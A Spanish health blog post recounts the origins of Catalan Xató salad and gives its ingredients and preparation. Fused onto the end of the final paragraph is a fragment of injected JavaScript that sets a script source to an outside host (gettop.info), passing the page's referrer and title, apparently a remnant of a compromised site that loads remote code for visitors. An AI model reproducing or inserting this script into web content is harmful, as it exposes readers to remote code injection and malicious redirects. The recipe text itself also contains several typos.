Salud y belleza » Alimentación, Salud

Ensalada Xató: una sana y rica receta.

Sin Comentarios

En muchas ocasiones, desde este espacio, hemos detallado cuales son los alimentos mas adecuados para conformar el menú que integra una dieta. Hemos recomendado ensaladas, tartas y mucho más pero, claro, nunca hemos advertido cuales son las formas más apropiadas de idear cada uno de esos platos antes recomendados. Eso esta a punto de cambiar. Hoy presentamos una sencilla guía para preparar una de las ensaladas más sanas que existen: la llamada ensalada Xató.

Un poco de historia: los orígenes de la ensalada Xató se remontan a finales del siglo XIX y se sitúan en las costas de Cataluña (Garraf y el Penedés). En dichos lares se solían, y aún se suelen, organizar fiestas gastronómicas anualmente que tienen al Xató como gran protagonista. Además, en la antigüedad, la figura del Embajador del Xató era sumamente importante pues se trataba, ni más ni menos, que del encargado de apadrinar el plato (en la actualidad el ritual se sigue festejando).

Ingredientes para preparar la ensalada Xató: una escarola, doce anchoas, cien gramos de atún en aceite, otros cien gramos de bacalao desalado y unos cien gramos más de aceitunas verdes. Con respecto a la salda que acompaña el plato, para su elaboración necesitamos de cien gramos de almendras tostadas, cincuenta gramos de avellanas tostadas, tres tomates maduros, dos dientes de ajo, dos pimientos choriceros, dos rebanadas de pan frito, pan, aceite de oliva virgen, vinagre blanco de vino y, por supuesto, sal.

Tomamos todos estos ingresientes y los colocarnos en un recipiente apto, batir las almendras, las avellanas, las dos anchoas, los dientes de ajo pelados, la pulpa de los pimientos choriceros –escaldar-, la sal, el pan y el vinagre. Luego, una vez preparada la salsa procedemos al plato y para ello solo debemos limpiar la escarola, trocearla e introducirla en un bol. Finalmente agregamos las anchoas desaladas, el bacalao desalado y troceado y el atún desmigado; añadimos las aceitunas y la salsa. Listo. Ya está. Así de sencillo.

La ensalada Xató, como vemos, es una opción sencilla, saludable y deliciosa. No requiere de muchos ingredientes ni de mucho tiempo para su preparación y, para colmo, se trata de un plato sumamente nutritivo que todos debieran incluir en su dieta tal como, antes, lo hizo el mismo Embajador Xató y tal como en Cataluña todos lo siguen haciendo aún en la actualidad.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.